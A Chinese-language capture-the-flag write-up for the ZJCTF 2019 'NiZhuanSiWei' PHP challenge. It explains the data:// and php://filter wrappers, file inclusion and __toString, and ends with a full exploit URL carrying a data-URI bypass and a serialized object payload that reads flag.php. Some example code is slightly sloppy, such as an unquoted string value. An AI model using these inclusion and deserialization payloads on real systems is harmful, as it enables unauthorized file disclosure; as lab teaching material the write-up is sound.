php伪协议,文件包含[ZJCTF 2019]NiZhuanSiWei1

题目

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

小知识

1 $_GET会自己解码url一次，如果有url编码的话，所以http请求，编码和非编码混一起也是可以的

2 file_get_contents（）函数，左侧参数为指定文件，'r'为设置只读模式；顾名思义，就是读取文件内容

3 include实际上打开了一个php与其他文件的一个流，用于包含别的文件，不论别的文件格式是什么，只要能读到php的代码，就几乎等价于，这里多了一份那个文件的代码；并且值得注意的是，include的出错不会影响程序运行，require会

4 php伪协议，data伪协议，意义：相当于传入一个文件，可以指定文件类型和内容；题目中用到data://text/plain,welcome to the zjctf,大致就是，text/plain这个位置指定是纯文本，英文逗号后接我们要匹配的字符串###不依赖文件包含，给变量传一个文件相当于

5 filter伪协议，形态：php://filter/read=convert.base64-encode/resource=useless.php###依赖文件包含的函数，他依赖include函数打开的IO流；意义：首先他就是用来读取或者写入文件内容的，取决于是read=....还是write=...这个就是这个协议的第二个参数，filter也就是过滤器，它可以支持编码，resource也就是指定读取文件；整体大致意思就是，借着include这份IO流打开了，我们给$file传这玩意，因为是include($file)，就可以在浏览器上读到base64编码后的useless.php，编码是因为，本身我们是通过include这个IO流读取的，本身include是一个包含php文件代码执行，如果我们不编码就成代码的一部分了，我们读不到

5 echo 一个类变量的时候，就是在调用类的__tostring()方法

S1 先过了第一个if判断，text=data://text/plain,welcome to the zjctf

S2 通过文件包含，夹杂filter伪协议读取源文件代码：file=php://filter/read=convert.base64-encode/resource=useless.php

S3 解码得到的useless.php

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }
}  
?>  

S4 构造序列化的一个flag实例，其中的file变量 = flag.php，这样包含useless.php的时候，可以通过echo $password自定义的类型变量而调用类的__tostring方法，从而访问了flag.php

S5 序列化之前 ps：有个挺有趣的地方，我做的时候自定的Flag，懒得把函数也序列化进去，传给password也可以跑

//那个ps
<?php
class Flag{
    public $file = flag.php;
}
$a = new Flag();
serialize($a);//调用反序列化，就会激发__tostring函数，这个文件已经被包含了

<?php  

class Flag{  //flag.php  
    public $file = flag.php;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }
}
$a = new Flag();
serialize($a);//调用反序列化，就会激发__tostring函数，这个文件已经被包含了

//echo一个类的时候会激发这个类的__tostring方法，也算是自定义的一种序列化
echo serialize($a)
?>

S6 最后只需要include正常文件包含即可

tageturl/?text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}